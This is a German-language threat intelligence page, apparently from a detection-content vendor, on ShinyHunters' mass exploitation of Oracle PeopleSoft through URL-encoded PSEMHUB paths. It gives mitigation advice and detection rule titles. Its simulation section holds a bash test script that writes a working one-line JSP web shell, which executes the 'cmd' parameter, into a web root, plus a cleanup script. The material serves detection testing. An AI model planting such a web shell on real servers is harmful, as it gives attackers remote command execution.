SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHunters nimmt großangelegte Angriffe auf Oracle PeopleSoft wieder auf

Author Photo
SOC Prime Team linkedin icon Folgen
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Der Bedrohungsakteur UNC6240 (ShinyHunters) hat die groß angelegte Ausnutzung von Oracle PeopleSoft-Systemen über CVE-2026-35273 wieder aufgenommen. Die Kampagne nutzt URL-kodierte Pfade, um Web Application Firewalls (WAF) zu umgehen und Zugriff auf den verwundbaren Environment Management Hub-Endpunkt zu erhalten. Angreifer setzen mehrere Web-Shells zusammen mit der SIDEEYE-Backdoor ein, um Persistenz herzustellen, unbefugten Zugriff zu erhalten und die Datenexfiltration zu erleichtern.

Untersuchung

Mandiant und die Google Threat Intelligence Group dokumentierten einen Übergang von Zero-Day-Exploitation im Juni 2026 zu N-Day-Angriffen gegen ungepatchte Umgebungen. Forscher identifizierten die Verwendung der URL-Codierung (/PSEMHUB/) um stringbasierte WAF-Filterung zu umgehen. Die Analyse zeigte eine wiederkehrende Angriffssequenz, die die Zielvalidierung durch serialisierte Java-Objekte umfasst, gefolgt von der Bereitstellung trotianisierter Installationsprogramme und Tunneling-Dienstprogramme.

Abschwächung

Organisationen sollten sofort den Oracle Security Alert-Patch installieren, der CVE-2026-35273 adressiert, und die PSEMHUB-Anwendung deaktivieren oder entfernen. WAF-Konfigurationen sollten normalisierte URL-Pfade inspizieren und blockieren, anstatt sich ausschließlich auf die Übereinstimmung mit wörtlichen Zeichenfolgen zu verlassen. Sicherheitsteams sollten auch Zugangsdaten, die vom Web-Zugangspunkt erreichbar sind, rotieren und Anwendungsverzeichnisse auf verdächtige oder unbefugte Dateien überprüfen.

Reaktion

Falls eine Web-Shell entdeckt wird, sollten Verteidiger den betroffenen Host als vollständig kompromittiert betrachten und forensische Beweise vor der Behebung bewahren. Aktivieren Sie das Host-übergreifende Audit, um unerwartete Shell-Prozesse zu identifizieren, die vom WebLogic-Java-Prozess gestartet werden. Rotieren Sie exponierte Zugangsdaten, einschließlich Datenbank-Verbindungszeichenfolgen und Cloud-Credentials, während Sie ausgehende Netzwerkaktivitäten auf bekannte C2-Indikatoren überprüfen.

Angriffsverlauf

Wir aktualisieren diesen Teil noch.

Erkennungen

Mögliche Systeminventarisierung (über cmdline)

SOC Prime Team
29. Sep 2026

Verdächtige Command-and-Control-Aktivität durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (über dns)

SOC Prime Team
29. Sep 2026

Mögliche Manipulation von Base64-codierten Zeichenfolgen (über cmdline)

SOC Prime Team
29. Sep 2026

Remote-Datei-Upload/Download über Standard-Tools (über cmdline)

SOC Prime Team
29. Sep 2026

IOCs (HashSha256) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt

SOC Prime AI-Regeln
29. Sep 2026

IOCs (SourceIP) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt

SOC Prime AI-Regeln
29. Sep 2026

IOCs (DestinationIP) zur Erkennung: Erneuerte Massenausnutzungskampagne der ShinyHunters, die auf Oracle PeopleSoft abzielt

SOC Prime AI-Regeln
29. Sep 2026

Web-Shell-Bereitstellung durch Ausnutzung von CVE-2026-35273 [Windows-Prozesserstellung]

SOC Prime AI-Regeln
29. Sep 2026

UNC6240-Ausnutzung von Oracle PeopleSoft mit Web-Shells [Webserver]

SOC Prime AI-Regeln
29. Sep 2026

Simulationsausführung

  • Angriffserzählung & Befehle: Der Gegner identifiziert eine Oracle PeopleSoft-Instanz und versucht, eine Schwachstelle auszunutzen. Um einfache WAF-Signaturen zu umgehen, die nach der Zeichenfolge „PSEMHUB“ suchen, verwendet der Angreifer URL-Kodierung, um anzufordern /PSEMHUB/. Nach erfolgreicher Ausnutzung legt der Angreifer eine Web-Shell mit dem Namen x.jsp im Web-Root ab, um eine persistente Oberfläche für die Befehlsausführung bereitzustellen. Diese Sequenz imitiert die spezifischen Indikatoren für Kompromittierungen (IOCs), die in der UNC6240-Ausnutzungskampagne identifiziert wurden.

  • Regressionstest-Skript:

    #!/bin/bash
    # Simulationsskript für UNC6240-Web-Shell-Erkennung
    
    # 1. Pfade definieren (Anpassen an Zielumgebung)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/PSEMHUB/"
    
    echo "[+] Simulierte Web-Shell wird erstellt: $WEB_ROOT/$SHELL_NAME"
    # Einfachen JSP-Web-Shell-Inhalt erstellen
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] Erkennung durch URL-codierte Anfrage auslösen..."
    # Verwenden Sie curl, um den codierten Pfad anzufordern und den Logeintrag zu erzeugen
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] Simulation abgeschlossen. Prüfen Sie SIEM auf Erkennung."
  • Bereinigungskommandos:

    #!/bin/bash
    # Bereinigungsskript
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] Simulationdateien werden bereinigt..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] Bereinigung abgeschlossen."